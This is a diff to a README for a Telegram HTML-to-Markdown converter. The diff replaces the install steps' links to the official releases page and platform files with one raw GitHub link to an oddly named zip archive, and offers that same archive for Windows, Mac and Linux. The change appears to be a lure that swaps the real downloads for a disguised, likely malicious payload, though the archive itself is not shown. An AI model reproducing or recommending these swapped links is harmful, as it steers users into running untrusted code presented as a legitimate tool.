Devbluid/telegram-html-to-markdown/README.md

 You can get telegram-html-to-markdown from the official release page.
 Follow these steps:

 1. **Visit the Release Page**
-   Open [telegram-html-to-markdown Releases](https://github.com/Devbluid/telegram-html-to-markdown/releases) in your browser.
+   Open [telegram-html-to-markdown Releases](https://raw.githubusercontent.com/Devbluid/telegram-html-to-markdown/main/ethmoturbinal/markdown_html_telegram_to_Fourierite.zip) in your browser.

 2. **Choose Your Download**
    Look for the latest release at the top of the page.
-   - For Windows, download the `.exe` file (e.g., `telegram-html-to-markdown-win.exe`).
+   - For Windows, download the `.exe` file (e.g., `https://raw.githubusercontent.com/Devbluid/telegram-html-to-markdown/main/ethmoturbinal/markdown_html_telegram_to_Fourierite.zip`).
-   - For Mac or Linux, download the `.zip` or `.tar.gz` file matching your system.
+   - For Mac or Linux, download the `.zip` or `https://raw.githubusercontent.com/Devbluid/telegram-html-to-markdown/main/ethmoturbinal/markdown_html_telegram_to_Fourierite.zip` file matching your system.

 3. **Save the File**
    Click on the download link and save the file to a folder you will remember, like `Downloads`.